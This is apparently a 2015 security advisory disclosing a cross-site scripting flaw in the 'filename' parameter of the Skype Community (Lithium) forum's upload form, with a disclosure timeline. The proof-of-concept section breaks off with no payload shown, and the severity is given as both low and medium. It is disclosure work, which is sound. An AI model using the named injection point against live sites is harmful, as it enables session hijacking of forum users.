Document Title: =============== Lithium Forum - Client Side POST Inject Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1519 Release Date: ============= 2015-12-22 Vulnerability Laboratory ID (VL-ID): ==================================== 1519 Common Vulnerability Scoring System: ==================================== 3.7 Product & Service Introduction: =============================== Skype is a proprietary voice-over-Internet Protocol service and software application originally created in 2003 by Swedish entrepreneur Niklas Zennström and his Danish partner Janus Friis. It has been owned by Microsoft since 2011. The service allows users to communicate with peers by voice, video, and instant messaging over the Internet. Phone calls may be placed to recipients on the traditional telephone networks. Calls to other users within the Skype service are free of charge, while calls to landline telephones and mobile phones are charged via a debit-based user account system. Skype has also become popular for its additional features, including file transfer, and videoconferencing. Competitors include SIP and H.323-based services, such as Linphone, as well as the Google Talk service, Mumble and Hall.com. Skype has 663 million registered users as of September 2011. The network is operated by Microsoft, which has its Skype division headquarters in Luxembourg. Most of the development team and 44% of the overall employees of the division are situated in Tallinn and Tartu, Estonia. Unlike most other VoIP services, Skype is a hybrid peer-to-peer and client–server system. It makes use of background processing on computers running Skype software. Skype`s original proposed name (Sky Peer-to-Peer) reflects this fact. Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Skype) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a client-side POST inject web vulnerability in the official Microsoft Skype Community online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-06-10: Researcher Notification & Coordination (Hadji Samir - Evolution Security) 2015-06-12: Vendor Notification 1 (Security Team) 2015-**-**: Vendor Response/Feedback (Security Team) 2015-11-30: Vendor Fix/Patch (Developer Team) 2015-12-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Low Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Microsoft Skype Community online service web-application. The security vulnerability allows remote attackers to manipulate client-side application to browser requests to compromise session data/information. The security vulnerability is located in the `filename` value of the `Skype Community - t5/forums/postpage.messageeditorform.form.form.form` module. Remote attackers are able to inject malicious script codes to client-side application requests. Remote attackers are able to prepare special crafted weblinks to execute client-side script code that compromises the skype community forum user/admin session data. The execution of the script code occurs in the exception-handling of the upload POST method request. The attack vector of the vulnerability is located on the client-side of the online-service and the request method to inject or execute the code is POST. Due to the testings and research we figured out that several high class vendors using the commercial lithium web-application. The security risk of the non-persistent cross site vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the non-persistent cross site scripting web vulnerability requires a low privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. Request Method(s): [+] POST Vulnerable Module(s): [+] Skype Community > t5/forums/ Vulnerable File(s): [+] t5/forums/postpage.messageeditorform.form.form.form Vulnerable Parameter(s): [+] filename Proof of Concept (PoC): ======================= The client-side cross site scripting exception web vulnerability can be exploited by remote attackers with low privilege web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exception handling - Lithium Forum (Skype Community)

Correct the highlighted errors and try again.